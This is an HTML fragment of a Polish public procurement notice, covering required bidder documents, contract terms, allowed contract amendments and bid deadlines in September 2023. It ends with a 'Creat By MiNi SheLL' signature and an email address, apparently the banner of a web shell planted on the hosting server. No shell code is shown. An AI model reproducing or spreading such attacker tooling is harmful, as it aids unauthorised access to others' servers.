SWZ)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Formularz ofertowy (Załącznik nr 1 do SWZ)<br/>2. Aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu – zgodnie z Załącznikiem nr 3 do SWZ. Informacje zawarte w oświadczeniu, stanowią wstępne potwierdzenie, że Wykonawca spełnia warunki udziału w postępowaniu.<br/>NA WEZWANIE:<br/>3) Dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną szczegółowo w rozdziale IX ust. 2 pkt 3a SWZ;<br/>4) Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie<br/>do dysponowania tymi osobami (zdefiniowane szczegółowo w rozdziale IX ust. 2 pkt 4b SWZ)<br/>(Wzór wykazu osób stanowi załącznik nr 7 do SWZ).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> XIII. Informacja dla wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(spółki cywilne/ konsorcja)<br/>1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo<br/>winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia,<br/>o których mowa w rozdz. XII pkt 3 SWZ, składa każdy z wykonawców. Oświadczenia te<br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim<br/>każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie,<br/>z którego wynika, które usługi wykonają poszczególni wykonawcy. (Wzór oświadczenia stanowi<br/>załącznik nr 5 do SWZ)<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa<br/>osobno każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> WYCIĄG Z WZORU UMOWY:<br/>14 Istotne zmiany umowy<br/>1. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w<br/>stosunku do treści złożonej oferty w zakresie terminu realizacji przedmiotu umowy w<br/>przypadku:<br/>a) zaistnienia okoliczności związanych z wystąpieniem chorób zakaźnych (epidemii,<br/>pandemii) i wywołanych nimi sytuacji kryzysowych, które mają lub mogą mieć wpływ na<br/>należyte wykonanie umowy, złożenie przez stronę umowy zawiadomienia o wystąpieniu<br/>tychże okoliczności wraz z niezbędnymi oświadczeniami lub dokumentami;<br/>b) wystąpienia przyczyn zewnętrznych, których nie można było przewidzieć w chwili zawarcia<br/>umowy, a które skutkują niemożliwością terminowego wykonania przedmiotu umowy,<br/>pomimo zachowania należytej staranności;<br/>c) niekorzystnych warunków atmosferycznych, uniemożliwiających prowadzenie robót,<br/>dostaw lub usług, w tym również dokonywanie odbiorów - fakt ten musi zostać zgłoszony<br/>pisemnie Zamawiającemu i przez niego potwierdzony;<br/>d) wprowadzenia zmian w stosunku do dokumentacji przetargowej w zakresie wykonania<br/>robót, dostaw lub usług zamiennych, w sytuacji usprawnienia procesu inwestycyjnego i<br/>uzyskania założonego efektu użytkowego o czas niezbędny na dokonanie zmian w<br/>dokumentacji przetargowej,<br/>e) wystąpienia robót dodatkowych, nieprzewidzianych w dokumentacji przetargowej,<br/>2. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w<br/>stosunku do treści złożonej oferty w przypadku konieczności podpisania umowy<br/>podwykonawczej, gdy Wykonawca nie wskazał w ofercie, że przedmiot umowy wykona z<br/>udziałem Podwykonawców, może na etapie realizacji umowy powierzyć im wykonanie części<br/>przedmiotu zamówienia z zastrzeżeniem §6 ust. 4-14. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-19 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">internet, platforma e-zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-19 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-10-18</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com